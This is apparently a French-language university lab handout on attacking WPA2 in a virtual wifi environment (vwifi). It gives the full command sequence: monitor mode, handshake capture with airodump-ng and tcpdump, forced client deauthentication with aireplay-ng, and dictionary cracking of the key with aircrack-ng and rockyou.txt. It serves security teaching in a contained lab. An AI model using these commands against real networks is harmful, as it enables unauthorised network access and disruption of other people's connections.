SA 12 : Attaques Wifi - WPA/WPA2 basé sur Vwifi

Objectifs

Objectifs du TP


1. Mise en place du réseau wifi


2. Configuration du réseau sans fil

[!WARNING] Important Lancez tmux sur les VMs pour travailler sur plusieurs outils en même temps. Les commandes doivent être lancées en sudo sur la machine debian. On est dejà en root sur l’alpine.

Sur la vm AP

ip link sh
sudo ip a a 10.0.0.1/8 dev wlan0

Configuration de hostapd

hostapd est un service Linux permettant la mise en place d’un point d’accès wifi. Il gère tous les protocoles de sécurité de la spécification 802.11, à savoir OPEN, WEP, WPA, WPA2, etc.

sudo hostapd ~/vwifi/tests/hostapd_wpa.conf

[!TIP] Personnalisation Les informations dans hostapd_wpa.conf peuvent être modifiées si vous le souhaitez pour changer le mot de passe, le BSSID, etc.

Sur CL_Wifi

Lancement de wpa_supplicant

wpa_supplicant est un utilitaire Linux qui facilite la connexion à un AP configuré en mode WPA2.

sudo wpa_supplicant -Dnl80211 -iwlan0 -c ~/vwifi/tests/wpa_supplicant.conf
sudo ip a a 10.0.0.2/8 dev wlan0

3. Attaque sur le protocol WPA2

Sur la machine attacker

Mettre la carte wifi en mode monitoring

La première chose à faire pour un pentester est de capturer le trafic réseau en mettant l’interface réseau sans fil en mode monitoring.

# Identifier votre interface wifi
ip link show

# Désactiver l’interface
ip link set wlan0 down

# Passer en mode monitor
iw dev wlan0 set type monitor

# Réactiver
ip link set wlan0 up

# Vérifier
iw dev wlan0 info

Ou avec airmon-ng

airmon-ng start wlan0
# L’interface devient wlan0mon
iw dev wlan0mon info
# pour affichier les infos de l’interface en mode monitor

[!QUESTION] Réflexion Quelle est la différence entre le mode monitoring et promiscuous ?

ip link show

Fixer la carte sur le canal de l’AP

sudo iw dev wlan0 set channel CH

Analyse du trafic avec Wireshark

sudo tcpdump -i wlan0mon \
  -w handshake.pcap \
  -s 0 \
  'ether proto 0x888e'

Handshake WPA2

[!QUESTION] Questions

Handshake WPA2

[!QUESTION] Définissez le rôle de

Dump du trafic réseau avec airodump

Afin de réussir l’attaque, nous devons récupérer les messages échangés lors du handshake.

  1. Lancez la commande suivante, relevez le BSSID de l’AP ainsi que le numéro du canal, puis quittez :

    airodump-ng "interface_en_mode_monitor"
    
  2. Relancez la capture en ciblant l’AP à pirater :

    mkdir captured_pkt
    
    airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX \
      -w /home/debian/captured_pkt/$(date +%d%m%y_%H%M%S) wlan1mon
    

    Sortie airodump-ng avec BSSID et canal

[!IMPORTANT] Pré-requis Pour récupérer les trames échangées lors du handshake entre CL_Wifi et l’AP, vous devez obliger le client à se déconnecter, puis à se reconnecter à l’AP. Ceci est réalisable grâce au sous-type Deauthentication de la trame management prévu par les spécifications 802.11.

aireplay-ng wlan1mon --deauth=3 -a XX:XX:XX:XX:XX:XX
aireplay-ng wlan1mon --deauth=3 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY

Trames de deauthentication capturées

[!QUESTION] Réflexion Existe-t-il une protection contre ce type d’attaque ?

Retrouver la clé (PSK)

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
aircrack-ng -a2 -b XX:XX:XX:XX:XX:XX -w rockyou.txt captured_pkt/121220_193050.cap

Résultat de aircrack-ng après tentative de récupération de la PSK

[!QUESTION] Recherche bibliographique En réalisant une petite recherche bibliographique, expliquez avec vos mots cette attaque. Je vous recommande de lire cet article.